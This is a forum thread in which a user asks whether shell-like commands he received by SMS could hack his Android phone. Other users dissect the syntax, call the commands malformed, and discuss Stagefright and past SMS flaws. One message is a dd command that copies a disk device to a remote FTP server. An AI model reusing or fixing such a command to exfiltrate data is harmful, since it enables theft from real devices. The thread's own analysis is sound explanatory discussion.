Phone hacking through SMS

[boball]

I am getting a SMS that seems to be a hacking command.
Can anyone tell what this command does?

`/bin/sh ps aux | grep -i dd | grep -v ftp > pkill -f "dd" --halt -t 9 days -SIGTERM -exec sbtemp20161011@gmail.com -S "bda"`~:/

 

[boball]

On September 12, I had got an SMS from the same phone number (+1 561-935-9982) which seems to be a hacking command too:

dd if=/dev/ad0 of=ftp://silliconboy.secureftp.us bs=1M conv=noerror mode=silent

It looks like someone is trying to run a file copy command ("dd") to copy the files on my phone to a remote ftp server.

Is this really happening?
Can anyone execute UNIX commands on Android phones just by sending an SMS?

 

[kate]

Can anyone execute UNIX commands on Android phones just by sending an SMS?

As far as I know that's not possible, texting apps can't execute command line code.

 

[scary alien]

Welcome to AF, @boball.

Well, that is a bit odd that you'd receive something like that in an SMS message...

Spoiler: regarding the command in your first post

Let's break it down:

/bin/sh ps aux starts a shell and invokes the ps command with the "aux" switches (i.e., display all processes); that's a bit odd to me since you (or I would, anyway) use /bin/sh -c "ps aux" to accomplish what I think that implies; I get an error when I try to run such a command in a Cygwin bash shell; one other thing, the shell on an Android device is located in /system/bin and not in /bin/sh (unless you're in custom recovery, etc.)​

that command's output get's piped to the next command:

grep -i dd searches the output of the prior command for the case-insensitive string "dd" (which is a disk utility)​

next, that output is piped to:

grep -v ftp which says to search and discard any lines with "ftp" in them​

But here's where it get a bit odd and breaks down, in my opinion since the next character after the above command is not the "|" (pipe) but is the ">" output redirection that will send the output to a file named in the next character string--"pkill" in this case; however, that "pkill" string appears that it should be a command all unto itself along with the rest of the characters in the command.

So, it kind of breaks down (again) for me there and just the whole thing smacks of someone mish-mashing some Linux commands together.

Your second post's "/dev/ad0" device is likely not referencing an Android disk or path--those appear to be IDE drives on a FreeBSD Linux distro (see http://disktype.sourceforge.net/doc/ch01s04.html).

Also agree with @kate--I can't imagine this working via SMS as there's no clear path to a Linux shell from an SMS text.

Someone is sending errant texts or is messing with you...

 

[boball]

I reported the issue to Google (via phone) and they thanked me for reporting the issue. They didn't say anything on if it's possible. They just gave a general advice of changing my passwords. But they really appreciated me for reporting the issue and also told me to report it to my carrier too.

I have heard in the past that Android, being open source, is "hackable" (anything is possible since it is open source), and that, at least in previous versions of Android in the past, there were vulnerabilities that allowed commands to be sent via SMS that could be executed if the SMS was opened.

 

[boball]

Welcome to AF, @boball.

Well, that is a bit odd that you'd receive something like that in an SMS message...

Spoiler: regarding the command in your first post

Let's break it down:

/bin/sh ps aux starts a shell and invokes the ps command with the "aux" switches (i.e., display all processes); that's a bit odd to me since you (or I would, anyway) use /bin/sh -c "ps aux" to accomplish what I think that implies; I get an error when I try to run such a command in a Cygwin bash shell; one other thing, the shell on an Android device is located in /system/bin and not in /bin/sh (unless you're in custom recovery, etc.)​

that command's output get's piped to the next command:

grep -i dd searches the output of the prior command for the case-insensitive string "dd" (which is a disk utility)​

next, that output is piped to:

grep -v ftp which says to search and discard any lines with "ftp" in them​

But here's where it get a bit odd and breaks down, in my opinion since the next character after the above command is not the "|" (pipe) but is the ">" output redirection that will send the output to a file named in the next character string--"pkill" in this case; however, that "pkill" string appears that it should be a command all unto itself along with the rest of the characters in the command.

So, it kind of breaks down (again) for me there and just the whole thing smacks of someone mish-mashing some Linux commands together.

Your second post's "/dev/ad0" device is likely not referencing an Android disk or path--those appear to be IDE drives on a FreeBSD Linux distro (see http://disktype.sourceforge.net/doc/ch01s04.html).

Also agree with @kate--I can't imagine this working via SMS as there's no clear path to a Linux shell from an SMS text.

Someone is sending errant texts or is messing with you...

Thanks for all the info. On the whole, the second SMS seems to be "killing" the "dd" process (file copying?) which was apparently initiated in the first SMS, based on the "pkill" command , but I am not sure of the all parameters in that "pkill" command : pkill -f "dd" --halt -t 9 days -SIGTERM -exec sbtemp20161011@gmail.com -S "bda"

 

[scary alien]

Yeah, not sure...most of those parameters don't "fit" or belong with the pkill command (at least not the FreeBSD version)--so, again, it makes less sense overall...

 

[AZgl1500]

IMO,

someone is just having fun at your expense....

 

[Hadron]

I have heard in the past that Android, being open source, is "hackable" (anything is possible since it is open source), and that, at least in previous versions of Android in the past, there were vulnerabilities that allowed commands to be sent via SMS that could be executed if the SMS was opened.

I guess you are thinking of the "stagefright" vulnerability. That is fixed now unless you are running an old version of Android, but it in any case relied on MMS to carry a payload (hidden in a embedded video which would exploit a bug in a video processing library). I don't think this would work with SMS even if the commands were syntactically correct.

But closed source OS's are just as hackable as open, contrary to the story Microsoft spent years pushing (in order to protect their markets from Linux adoption). For example the closed source iOS did, ironically, have a vulnerability which would allow code execution via SMS! This was a few years back now, but real computer security is more complex than simple slogans about open or closed.